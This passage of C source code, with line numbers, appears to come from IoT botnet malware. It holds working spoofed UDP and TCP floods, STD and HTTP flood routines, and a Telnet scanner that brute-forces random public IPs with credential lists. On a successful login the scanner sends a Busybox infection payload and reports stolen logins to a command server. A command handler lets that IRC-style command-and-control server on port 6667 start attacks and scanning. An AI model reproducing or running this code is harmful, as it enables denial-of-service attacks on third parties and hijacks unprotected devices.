  862. struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
  863. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + packetsize);
  864. udph->len = htons(sizeof(struct udphdr) + packetsize);
  865. udph->source = rand_cmwc();
  866. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
  867. udph->check = 0;
  868.  
  869. makeRandomStr((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), packetsize);
  870. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  871. int end = time(NULL) + timeEnd;
  872. register unsigned int i = 0;
  873. while(1)
  874. {
  875. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  876. udph->source = rand_cmwc();
  877. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
  878. iph->id = rand_cmwc();
  879. iph->saddr = htonl( getRandomIP(netmask) );
  880. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  881. if(i == pollRegister)
  882. {
  883. if(time(NULL) > end) break;
  884. i = 0;
  885. continue;
  886. }
  887. i++;
  888. }
  889. }
  890. }
  891.  
  892. void sendTCP(unsigned char *target, int port, int timeEnd, int spoofit, unsigned char *flags, int packetsize, int pollinterval)
  893. {
  894. register unsigned int pollRegister;
  895. pollRegister = pollinterval;
  896. struct sockaddr_in dest_addr;
  897.  
  898. dest_addr.sin_family = AF_INET;
  899. if(port == 0) dest_addr.sin_port = rand_cmwc();
  900. else dest_addr.sin_port = htons(port);
  901. if(getHost(target, &dest_addr.sin_addr)) return;
  902. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  903. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
  904. if(!sockfd)
  905. {
  906. sockprintf(mainCommSock, "Failed opening raw socket.");
  907. return;
  908. }
  909.  
  910. int tmp = 1;
  911. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
  912. {
  913. sockprintf(mainCommSock, "Failed setting raw headers mode.");
  914. return;
  915. }
  916.  
  917. in_addr_t netmask;
  918.  
  919. if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
  920. else netmask = ( ~((1 << (32 - spoofit)) - 1) );
  921.  
  922. unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize];
  923. struct iphdr *iph = (struct iphdr *)packet;
  924. struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
  925.  
  926. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize);
  927.  
  928. tcph->source = rand_cmwc();
  929. tcph->seq = rand_cmwc();
  930. tcph->ack_seq = 0;
  931. tcph->doff = 5;
  932.  
  933. if(!strcmp(flags, "ALL"))
  934. {
  935. tcph->syn = 1;
  936. tcph->rst = 1;
  937. tcph->fin = 1;
  938. tcph->ack = 1;
  939. tcph->psh = 1;
  940. }
  941. else
  942. {
  943. unsigned char *pch = strtok(flags, ",");
  944. while(pch)
  945. {
  946. if(!strcmp(pch, "SYN"))
  947. {
  948. tcph->syn = 1;
  949. }
  950. else if(!strcmp(pch, "RST"))
  951. {
  952. tcph->rst = 1;
  953. }
  954. else if(!strcmp(pch, "FIN"))
  955. {
  956. tcph->fin = 1;
  957. }
  958. else if(!strcmp(pch, "ACK"))
  959. {
  960. tcph->ack = 1;
  961. }
  962. else if(!strcmp(pch, "PSH"))
  963. {
  964. tcph->psh = 1;
  965. }
  966. else
  967. {
  968. sockprintf(mainCommSock, "Invalid flag \"%s\"", pch);
  969. }
  970. pch = strtok(NULL, ",");
  971. }
  972. }
  973.  
  974. tcph->window = rand_cmwc();
  975. tcph->check = 0;
  976. tcph->urg_ptr = 0;
  977. tcph->dest = (port == 0 ? rand_cmwc() : htons(port));
  978. tcph->check = tcpcsum(iph, tcph);
  979. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  980.  
  981. int end = time(NULL) + timeEnd;
  982. register unsigned int i = 0;
  983. while(1)
  984. {
  985. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  986.  
  987. iph->saddr = htonl( getRandomIP(netmask) );
  988. iph->id = rand_cmwc();
  989. tcph->seq = rand_cmwc();
  990. tcph->source = rand_cmwc();
  991. tcph->check = 0;
  992. tcph->check = tcpcsum(iph, tcph);
  993. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  994. if(i == pollRegister)
  995. {
  996. if(time(NULL) > end) break;
  997. i = 0;
  998. continue;
  999. }
  1000. i++;
  1001. }
  1002. }
  1003.  
  1004. void sendSTD(unsigned char *ip, int port, int secs)
  1005. {
  1006. int iSTD_Sock;
  1007. iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0);
  1008. time_t start = time(NULL);
  1009. struct sockaddr_in sin;
  1010. struct hostent *hp;
  1011. hp = gethostbyname(ip);
  1012. bzero((char*) &sin,sizeof(sin));
  1013. bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  1014. sin.sin_family = hp->h_addrtype;
  1015. sin.sin_port = port;
  1016. unsigned int a = 0;
  1017. while(1)
  1018. {
  1019. if (a >= 50)
  1020. {
  1021. send(iSTD_Sock, "dts", 50, 0);
  1022. connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin));
  1023. if (time(NULL) >= start + secs)
  1024. {
  1025. close(iSTD_Sock);
  1026. _exit(0);
  1027. }
  1028. a = 0;
  1029. }
  1030. a++;
  1031. }
  1032. }
  1033.  
  1034. int socket_connect(char *host, in_port_t port) {
  1035. struct hostent *hp;
  1036. struct sockaddr_in addr;
  1037. int on = 1, sock;
  1038. if ((hp = gethostbyname(host)) == NULL) return 0;
  1039. bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
  1040. addr.sin_port = htons(port);
  1041. addr.sin_family = AF_INET;
  1042. sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  1043. setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
  1044. if (sock == -1) return 0;
  1045. if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1) return 0;
  1046. return sock;
  1047. }
  1048.  
  1049. void sendHTTP(char *method, char *host, in_port_t port, char *path, int timeEnd, int power)
  1050. {
  1051. int socket, i, end = time(NULL) + timeEnd, sendIP = 0;
  1052. char request[512], buffer[1];
  1053. for (i = 0; i < power; i++)
  1054. {
  1055. const char *ghpagents[] = {
  1056. "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
  1057. "Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1",
  1058. "Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)",
  1059. "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4",
  1060. "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
  1061. "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911",
  1062. "Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2",
  1063. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)",
  1064. "Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285",
  1065. "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7",
  1066. "Mozilla/5.0 (PLAYSTATION 3; 3.55)",
  1067. "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2",
  1068. "wii libnup/1.0",
  1069. "Mozilla/4.0 (PSP (PlayStation Portable); 2.00)",
  1070. "PSP (PlayStation Portable); 2.00",
  1071. "Bunjalloo/0.7.6(Nintendo DS;U;en)",
  1072. "Doris/1.15 [en] (Symbian)",
  1073. "BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",
  1074. "BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100",
  1075. "Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
  1076. "Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01",
  1077. "Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62",
  1078. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
  1079. "Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
  1080. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19",
  1081. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)",
  1082. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)",
  1083. "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Skyfire/2.0",
  1084. "SonyEricssonW800i/R1BD001/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
  1085. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)",
  1086. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20110517 Firefox/5.0 Fennec/5.0",
  1087. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)",
  1088. "MOT-V300/0B.09.19R MIB/2.2 Profile/MIDP-2.0 Configuration/CLDC-1.0",
  1089. "Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0",
  1090. "Mozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000",
  1091. "MOT-L7/08.B7.ACR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1"
  1092. };
  1093. sprintf(request, "%s %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n", method, path, host, ghpagents[(rand() % 36)]);
  1094. if (fork())
  1095. {
  1096. while (end > time(NULL))
  1097. {
  1098. socket = socket_connect(host, port);
  1099. if (socket != 0)
  1100. {
  1101. write(socket, request, strlen(request));
  1102. read(socket, buffer, 1);
  1103. close(socket);
  1104. }
  1105. }
  1106. exit(0);
  1107. }
  1108. }
  1109. }
  1110.  
  1111. int contains_string(char* buffer, char** strings)
  1112. {
  1113. int num_strings = 0, i = 0;
  1114. for(num_strings = 0; strings[++num_strings] != 0; );
  1115. for(i = 0; i < num_strings; i++)
  1116. {
  1117. if(strcasestr(buffer, strings[i]))
  1118. {
  1119. return 1;
  1120. }
  1121. }
  1122. return 0;
  1123. }
  1124.  
  1125. int contains_success(char* buffer)
  1126. {
  1127. return contains_string(buffer, successes);
  1128. }
  1129. int contains_fail(char* buffer)
  1130. {
  1131. return contains_string(buffer, fails);
  1132. }
  1133. int contains_response(char* buffer)
  1134. {
  1135. return contains_success(buffer) || contains_fail(buffer);
  1136. }
  1137.  
  1138. const char *get_telstate_host(struct telstate_t* telstate)
  1139. {
  1140. struct in_addr in_addr_ip;
  1141. in_addr_ip.s_addr = telstate->ip;
  1142. return inet_ntoa(in_addr_ip);
  1143. }
  1144.  
  1145. int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char **strings)
  1146. {
  1147. int num_bytes, i;
  1148. memset(buffer, 0, buf_size);
  1149. num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size);
  1150.  
  1151. if(buffer[0] == 0xFF)
  1152. {
  1153. negotiate(fd, buffer, 3);
  1154. }
  1155.  
  1156. if(contains_string(buffer, strings))
  1157. {
  1158. return 1;
  1159. }
  1160.  
  1161. return 0;
  1162. }
  1163.  
  1164. int read_with_timeout(int fd, int timeout_usec, char* buffer, int buf_size)
  1165. {
  1166. fd_set read_set;
  1167. struct timeval tv;
  1168. tv.tv_sec = 0;
  1169. tv.tv_usec = timeout_usec;
  1170. FD_ZERO(&read_set);
  1171. FD_SET(fd, &read_set);
  1172. if (select(fd+1, &read_set, NULL, NULL, &tv) < 1)
  1173. return 0;
  1174. return recv(fd, buffer, buf_size, 0);
  1175. }
  1176.  
  1177. void reset_telstate(struct telstate_t* telstate)
  1178. {
  1179. advance_telstate(telstate, 0);
  1180. telstate->complete = 1;
  1181. }
  1182.  
  1183. void advance_telstate(struct telstate_t* telstate, int new_state)
  1184. {
  1185. if(new_state == 0)
  1186. {
  1187. close(telstate->fd);
  1188. }
  1189.  
  1190. telstate->tTimeout = 0;
  1191. telstate->state = new_state;
  1192. memset((telstate->sockbuf), 0, SOCKBUF_SIZE);
  1193. }
  1194.  
  1195. in_addr_t getRandomPublicIP() {
  1196. static uint8_t ipState[4] = {0};
  1197. ipState[0] = rand() % 223;
  1198. ipState[1] = rand() % 255;
  1199. ipState[2] = rand() % 255;
  1200. ipState[3] = rand() % 255;
  1201. while(
  1202. (ipState[0] == 0) ||
  1203. (ipState[0] == 10) ||
  1204. (ipState[0] == 100 && (ipState[1] >= 64 && ipState[1] <= 127)) ||
  1205. (ipState[0] == 127) ||
  1206. (ipState[0] == 169 && ipState[1] == 254) ||
  1207. (ipState[0] == 172 && (ipState[1] <= 16 && ipState[1] <= 31)) ||
  1208. (ipState[0] == 192 && ipState[1] == 0 && ipState[2] == 2) ||
  1209. (ipState[0] == 192 && ipState[1] == 88 && ipState[2] == 99) ||
  1210. (ipState[0] == 192 && ipState[1] == 168) ||
  1211. (ipState[0] == 198 && (ipState[1] == 18 || ipState[1] == 19)) ||
  1212. (ipState[0] == 198 && ipState[1] == 51 && ipState[2] == 100) ||
  1213. (ipState[0] == 203 && ipState[1] == 0 && ipState[2] == 113) ||
  1214. (ipState[0] >= 224)
  1215. )
  1216. {
  1217. ipState[0] = rand() % 223;
  1218. ipState[1] = rand() % 255;
  1219. ipState[2] = rand() % 255;
  1220. ipState[3] = rand() % 255;
  1221. }
  1222. char ip[16] = {0};
  1223. szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  1224. return inet_addr(ip);
  1225. }
  1226.  
  1227. void TelnetScanner(int wait_usec, int maxfds)
  1228. {
  1229. int max = getdtablesize() - 100, i, res, num_tmps, j;
  1230.  
  1231. char buf[128], cur_dir;
  1232. if (max > maxfds)
  1233. max = maxfds;
  1234. fd_set fdset;
  1235. struct timeval tv;
  1236. socklen_t lon;
  1237. int valopt;
  1238.  
  1239. char line[256];
  1240. char* buffer;
  1241. struct sockaddr_in dest_addr;
  1242. dest_addr.sin_family = AF_INET;
  1243. dest_addr.sin_port = htons(23);
  1244. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1245.  
  1246. buffer = malloc(SOCKBUF_SIZE + 1);
  1247. memset(buffer, 0, SOCKBUF_SIZE + 1);
  1248.  
  1249. struct telstate_t fds[max];
  1250.  
  1251. memset(fds, 0, max * (sizeof(int) + 1));
  1252. for(i = 0; i < max; i++)
  1253. {
  1254. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  1255. fds[i].complete = 1;
  1256. fds[i].sockbuf = buffer;
  1257. }
  1258. while(1)
  1259. {
  1260. for(i = 0; i < max; i++)
  1261. {
  1262. if(fds[i].tTimeout == 0)
  1263. {
  1264. fds[i].tTimeout = time(NULL);
  1265. }
  1266. switch(fds[i].state)
  1267. {
  1268. case 0:
  1269. {
  1270. if(fds[i].complete == 1)
  1271. {
  1272. char *tmp = fds[i].sockbuf;
  1273. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  1274. fds[i].sockbuf = tmp;
  1275.  
  1276. fds[i].ip = getRandomPublicIP();
  1277. }
  1278. else if(fds[i].complete == 0)
  1279. {
  1280. fds[i].usernameInd++;
  1281. fds[i].passwordInd++;
  1282.  
  1283. if(fds[i].passwordInd == sizeof(passwords) / sizeof(char *))
  1284. {
  1285. fds[i].complete = 1;
  1286. continue;
  1287. }
  1288. if(fds[i].usernameInd == sizeof(usernames) / sizeof(char *))
  1289. {
  1290. fds[i].complete = 1;
  1291. continue;
  1292. }
  1293. }
  1294.  
  1295. dest_addr.sin_family = AF_INET;
  1296. dest_addr.sin_port = htons(23);
  1297. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1298. dest_addr.sin_addr.s_addr = fds[i].ip;
  1299.  
  1300. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
  1301.  
  1302. if(fds[i].fd == -1) continue;
  1303. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
  1304. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS)
  1305. {
  1306. reset_telstate(&fds[i]);
  1307. }
  1308. else
  1309. {
  1310. advance_telstate(&fds[i], 1);
  1311. }
  1312. }
  1313. break;
  1314.  
  1315. case 1:
  1316. {
  1317. FD_ZERO(&fdset);
  1318. FD_SET(fds[i].fd, &fdset);
  1319. tv.tv_sec = 0;
  1320. tv.tv_usec = wait_usec;
  1321. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
  1322.  
  1323. if(res == 1)
  1324. {
  1325. fds[i].tTimeout = 0;
  1326. lon = sizeof(int);
  1327. valopt = 0;
  1328. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  1329.  
  1330. if(valopt)
  1331. {
  1332. reset_telstate(&fds[i]);
  1333. }
  1334. else
  1335. {
  1336. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
  1337. advance_telstate(&fds[i], 2);
  1338. }
  1339. continue;
  1340. }
  1341. else if(res == -1)
  1342. {
  1343. reset_telstate(&fds[i]);
  1344. continue;
  1345. }
  1346. if(fds[i].tTimeout + 7 < time(NULL))
  1347. {
  1348. reset_telstate(&fds[i]);
  1349. }
  1350. }
  1351. break;
  1352.  
  1353. case 2:
  1354. {
  1355. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
  1356. {
  1357. fds[i].tTimeout = time(NULL);
  1358. if(contains_fail(fds[i].sockbuf))
  1359. {
  1360. advance_telstate(&fds[i], 0);
  1361. }
  1362. else
  1363. {
  1364. advance_telstate(&fds[i], 3);
  1365. }
  1366. continue;
  1367. }
  1368. if(fds[i].tTimeout + 7 < time(NULL))
  1369. {
  1370. reset_telstate(&fds[i]);
  1371. }
  1372. }
  1373. break;
  1374.  
  1375. case 3:
  1376. {
  1377. //sending usernames.
  1378. if(send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0)
  1379. {
  1380. reset_telstate(&fds[i]);
  1381. continue;
  1382. }
  1383. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
  1384. {
  1385. reset_telstate(&fds[i]);
  1386. continue;
  1387. }
  1388. advance_telstate(&fds[i], 4);
  1389. }
  1390. break;
  1391.  
  1392. case 4:
  1393. {
  1394. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
  1395. {
  1396. fds[i].tTimeout = time(NULL);
  1397. if(contains_fail(fds[i].sockbuf))
  1398. {
  1399. advance_telstate(&fds[i], 0);
  1400. }
  1401. else
  1402. {
  1403. advance_telstate(&fds[i], 5);
  1404. }
  1405. continue;
  1406. }
  1407. if(fds[i].tTimeout + 7 < time(NULL))
  1408. {
  1409. reset_telstate(&fds[i]);
  1410. }
  1411. }
  1412. break;
  1413.  
  1414. case 5:
  1415. {
  1416. if(send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0)
  1417. {
  1418. reset_telstate(&fds[i]);
  1419. continue;
  1420. }
  1421. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
  1422. {
  1423. reset_telstate(&fds[i]);
  1424. continue;
  1425. }
  1426. advance_telstate(&fds[i], 6);
  1427. }
  1428. break;
  1429.  
  1430. case 6:
  1431. {
  1432. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances2))
  1433. {
  1434. fds[i].tTimeout = time(NULL);
  1435.  
  1436. if(contains_fail(fds[i].sockbuf))
  1437. {
  1438. advance_telstate(&fds[i], 0);
  1439. }
  1440. else if(contains_success(fds[i].sockbuf))
  1441. {
  1442. if(fds[i].complete == 2)
  1443. {
  1444. advance_telstate(&fds[i], 7);
  1445. }
  1446. else
  1447. {
  1448. sockprintf(mainCommSock, "Successfully Bruted. || IP: %s || Username: %s || Password: %s", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
  1449. advance_telstate(&fds[i], 7);
  1450. }
  1451. }
  1452. else
  1453. {
  1454. reset_telstate(&fds[i]);
  1455. }
  1456. continue;
  1457. }
  1458.  
  1459. if(fds[i].tTimeout + 7 < time(NULL))
  1460. {
  1461. reset_telstate(&fds[i]);
  1462. }
  1463. }
  1464. break;
  1465.  
  1466. case 7:
  1467. {
  1468. fds[i].tTimeout = time(NULL);
  1469.  
  1470. if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0);
  1471. if(send(fds[i].fd, "shell\r\n", 7, MSG_NOSIGNAL) < 0);
  1472. if(send(fds[i].fd, BusyboxPayload, strlen(BusyboxPayload), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; };
  1473. sockprintf(mainCommSock, "Sending Infection Payload. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
  1474.  
  1475.  
  1476. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, "MonsterKush"))
  1477. {
  1478.  
  1479. if(strcasestr(fds[i].sockbuf, "MonsterKush") && fds[i].complete != 3)
  1480. {
  1481. sockprintf(mainCommSock, "Infection Success. || IP: %s: || Port: 23 || Username: %s || Password: %s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
  1482. fds[i].complete = 3;
  1483. }
  1484. }
  1485.  
  1486. if(fds[i].tTimeout + 10 < time(NULL))
  1487. {
  1488. if(fds[i].complete!=3)
  1489. {
  1490. sockprintf(mainCommSock, "Infection Failed. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
  1491. }
  1492. reset_telstate(&fds[i]);
  1493. }
  1494. break;
  1495. }
  1496. }
  1497. }
  1498. }
  1499. }
  1500.  
  1501.  
  1502.  
  1503. void processCmd(int argc, unsigned char *argv[])
  1504. {
  1505. int x;
  1506.  
  1507. if(!strcmp(argv[0], "PING"))
  1508. {
  1509. sockprintf(mainCommSock, "PONG!");
  1510. return;
  1511. }
  1512.  
  1513.  
  1514. if(!strcmp(argv[0], "UDP"))
  1515. {
  1516. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[5]) == -1 || atoi(argv[5]) > 65500 || atoi(argv[4]) > 32 || (argc == 7 && atoi(argv[6]) < 1))
  1517. {
  1518. return;
  1519. }
  1520.  
  1521. unsigned char *ip = argv[1];
  1522. int port = atoi(argv[2]);
  1523. int time = atoi(argv[3]);
  1524. int spoofed = atoi(argv[4]);
  1525. int packetsize = atoi(argv[5]);
  1526. int pollinterval = (argc == 7 ? atoi(argv[6]) : 10);
  1527.  
  1528. if(strstr(ip, ",") != NULL)
  1529. {
  1530. unsigned char *hi = strtok(ip, ",");
  1531. while(hi != NULL)
  1532. {
  1533. if(!listFork())
  1534. {
  1535. sendUDP(hi, port, time, spoofed, packetsize, pollinterval);
  1536. _exit(0);
  1537. }
  1538. hi = strtok(NULL, ",");
  1539. }
  1540. }
  1541. else
  1542. {
  1543. if (listFork())
  1544. {
  1545. return;
  1546. }
  1547. sendUDP(ip, port, time, spoofed, packetsize, pollinterval);
  1548. _exit(0);
  1549. }
  1550. }
  1551.  
  1552. if(!strcmp(argv[0], "SCANNER"))
  1553. {
  1554.  
  1555. if(!strcmp(argv[1], "OFF"))
  1556. {
  1557. if(scanPid == 0) return;
  1558. kill(scanPid, 9);
  1559. scanPid = 0;
  1560. }
  1561.  
  1562. if(!strcmp(argv[1], "ON"))
  1563. {
  1564. if(scanPid != 0) return;
  1565. uint32_t parent;
  1566. parent = fork();
  1567.  
  1568. if (parent > 0)
  1569. {
  1570. scanPid = parent;
  1571. return;
  1572. }
  1573. else if(parent == -1) return;
  1574.  
  1575. TelnetScanner(20, 1000);
  1576. _exit(0);
  1577. }
  1578. }
  1579.  
  1580. if(!strcmp(argv[0], "TCP"))
  1581. {
  1582. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[4]) > 32 || (argc > 6 && atoi(argv[6]) < 0) || (argc == 8 && atoi(argv[7]) < 1))
  1583. {
  1584. return;
  1585. }
  1586. unsigned char *ip = argv[1];
  1587. int port = atoi(argv[2]);
  1588. int time = atoi(argv[3]);
  1589. int spoofed = atoi(argv[4]);
  1590. unsigned char *flags = argv[5];
  1591.  
  1592. int pollinterval = argc == 8 ? atoi(argv[7]) : 10;
  1593. int psize = argc > 6 ? atoi(argv[6]) : 0;
  1594.  
  1595. if(strstr(ip, ",") != NULL)
  1596. {
  1597. unsigned char *hi = strtok(ip, ",");
  1598. while(hi != NULL)
  1599. {
  1600. if(!listFork())
  1601. {
  1602. sendTCP(hi, port, time, spoofed, flags, psize, pollinterval);
  1603. _exit(0);
  1604. }
  1605. hi = strtok(NULL, ",");
  1606. }
  1607. }
  1608. else
  1609. {
  1610. if (listFork())
  1611. {
  1612. return;
  1613. }
  1614. sendTCP(ip, port, time, spoofed, flags, psize, pollinterval);
  1615. _exit(0);
  1616. }
  1617. }
  1618.  
  1619. if(!strcmp(argv[0], "STD"))
  1620. {
  1621. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
  1622. {
  1623. return;
  1624. }
  1625.  
  1626. unsigned char *ip = argv[1];
  1627. int port = atoi(argv[2]);
  1628. int time = atoi(argv[3]);
  1629.  
  1630. if(strstr(ip, ",") != NULL)
  1631. {
  1632. unsigned char *hi = strtok(ip, ",");
  1633. while(hi != NULL)
  1634. {
  1635. if(!listFork())
  1636. {
  1637. sendSTD(hi, port, time);
  1638. _exit(0);
  1639. }
  1640. hi = strtok(NULL, ",");
  1641. }
  1642. }
  1643. else
  1644. {
  1645. if (listFork())
  1646. {
  1647. return;
  1648. }
  1649. sendSTD(ip, port, time);
  1650. _exit(0);
  1651. }
  1652. }
  1653.  
  1654. if (!strcmp(argv[0], "HTTP"))
  1655. {
  1656. if (argc < 6 || atoi(argv[3]) < 1 || atoi(argv[5]) < 1) return;
  1657. if (listFork()) return;
  1658. sendHTTP(argv[1], argv[2], atoi(argv[3]), argv[4], atoi(argv[5]), atoi(argv[6]));
  1659. exit(0);
  1660. }
  1661.  
  1662. if(!strcmp(argv[0], "KILLATTK"))
  1663. {
  1664. int killed = 0;
  1665. unsigned long i;
  1666. for (i = 0; i < numpids; i++)
  1667. {
  1668. if (pids[i] != 0 && pids[i] != getpid())
  1669. {
  1670. kill(pids[i], 9);
  1671. killed++;
  1672. }
  1673. }
  1674. }
  1675.  
  1676. if(!strcmp(argv[0], "LOLNOGTFO"))
  1677. {
  1678. exit(0);
  1679. }
  1680. }
  1681.  
  1682.  
  1683. int initConnection()
  1684. {
  1685. unsigned char server[4096];
  1686. memset(server, 0, 4096);
  1687. if(mainCommSock)
  1688. {
  1689. close(mainCommSock);
  1690. mainCommSock = 0;
  1691. }
  1692. if(currentServer + 1 == SERVER_LIST_SIZE) currentServer = 0;
  1693. else currentServer++;
  1694.  
  1695. strcpy(server, commServer[currentServer]);
  1696. int port = 6667;
  1697. if(strchr(server, ':') != NULL)
  1698. {
  1699. port = atoi(strchr(server, ':') + 1);
  1700. *((unsigned char *)(strchr(server, ':'))) = 0x0;
  1701. }
  1702. mainCommSock = socket(AF_INET, SOCK_STREAM, 0);
  1703. if(!connectTimeout(mainCommSock, server, port, 30)) return 1;
  1704. return 0;
  1705. }
  1706.  
  1707.  
  1708. int getOurIP()
  1709. {
  1710. int sock = socket(AF_INET, SOCK_DGRAM, 0);
  1711. if(sock == -1) return 0;
  1712.  
  1713. struct sockaddr_in serv;
  1714. memset(&serv, 0, sizeof(serv));
  1715. serv.sin_family = AF_INET;
  1716. serv.sin_addr.s_addr = inet_addr("8.8.8.8");
  1717. serv.sin_port = htons(53);
  1718.  
  1719. int err = connect(sock, (const struct sockaddr*) &serv, sizeof(serv));
